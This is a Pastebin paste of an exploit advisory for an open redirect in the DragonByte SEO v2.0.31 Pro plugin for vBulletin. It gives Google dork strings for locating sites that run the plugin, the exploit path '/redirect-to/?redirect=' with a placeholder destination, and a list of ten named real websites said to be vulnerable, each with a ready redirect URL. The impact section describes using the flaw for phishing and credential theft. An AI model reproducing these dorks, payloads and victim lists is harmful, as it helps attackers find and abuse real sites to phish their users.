Advertisement
KingSkrupellos

vBulletin 4.x.x DragonByte SEO v2.0.31 Pro Open Redirection

Mar 1st, 2019
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.24 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : vBulletin 4.x.x DragonByte SEO v2.0.31 Pro Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/02/2019
  7. # Vendor Homepages : vbulletin.com ~ dragonbyte-tech.com
  8. # Vendor Name : DragonByte Technologies
  9. # Software Information Link : dragonbyte-tech.com/store/dragonbyte-seo.303/
  10. # Software Affected Version : DragonByte SEO v2.0.31 (Pro)
  11. Compatible with vBulletin 3.8.x vBulletin 4.x.x
  12. # Software Price Type : Paid Download
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : High
  16. # Google Dorks :
  17. intext:Search Engine Optimisation provided by DragonByte SEO v2.0.31 (Pro)
  18. intext:Powered by vBulletin®
  19. intext:'Copyright © 2019 vBulletin Solutions, Inc. All rights reserved.
  20. intext:Premium TechTwo vBulletin Template developed by vBStyles.com
  21. intext:vBulletin Mods & Addons Copyright © 2019 DragonByte Technologies Ltd.
  22. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  23. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  24. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  25. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  26.  
  27. ####################################################################
  28.  
  29. # Description about Software :
  30. ***************************
  31. DragonByte SEO is a complete, modern and fully supported Search Engine Optimisation
  32.  
  33. solution for vBulletin 3.8.x and vBulletin 4.x.x, allowing you to easily eliminate duplicate
  34.  
  35. content penalties from search engines and improve the search engine friendliness
  36.  
  37. of your content URLs via multiple powerful tools.
  38.  
  39. ####################################################################
  40.  
  41. # Impact :
  42. *********
  43. This web application vBulletin 4.x.x DragonByte SEO v2.0.31 accepts a user-controlled
  44.  
  45. input that specifies a link to an external site, and uses that link in a Redirect.
  46.  
  47. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  48.  
  49. the web application to redirect the request to the specified URL. By modifying the URL value
  50.  
  51. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  52.  
  53. Because the server name in the modified link is identical to the original site, phishing attempts
  54.  
  55. have a more trustworthy appearance.
  56.  
  57. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  58.  
  59. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
  60.  
  61. Web users often encounter redirection when they visit the Web site of a company whose name
  62.  
  63. has been changed or which has been acquired by another company. Visiting unreal web page
  64.  
  65. user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  66.  
  67. ####################################################################
  68.  
  69. # Open Redirection Exploit :
  70. *************************
  71. /forum/redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  72.  
  73. /redirect-to/?redirect=https://www.[REDIRECTION-ADDRESS].gov
  74.  
  75. ####################################################################
  76.  
  77. # Example Vulnerable Sites :
  78. *************************
  79. [+] minibuggy.net/forum/redirect-to/?redirect=https://cxsecurity.com/
  80.  
  81. [+] cs.gen.tr/forum/redirect-to/?redirect=https://cxsecurity.com/
  82.  
  83. [+] tsforum.net/redirect-to/?redirect=https://cxsecurity.com/
  84.  
  85. [+] bellybelly.com.au/forums/redirect-to/?redirect=https://cxsecurity.com/
  86.  
  87. [+] scalemotorcars.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  88.  
  89. [+] stage.onesixthwarriors.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  90.  
  91. [+] hamyaryiran.ir/redirect-to/?redirect=https://cxsecurity.com/
  92.  
  93. [+] mexicoarmado.com/redirect-to/?redirect=https://cxsecurity.com/
  94.  
  95. [+] lg-developers.ir/redirect-to/?redirect=https://cxsecurity.com/
  96.  
  97. [+] professionalmusclebeta.com/forums/redirect-to/?redirect=https://cxsecurity.com/
  98.  
  99. ####################################################################
  100.  
  101. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement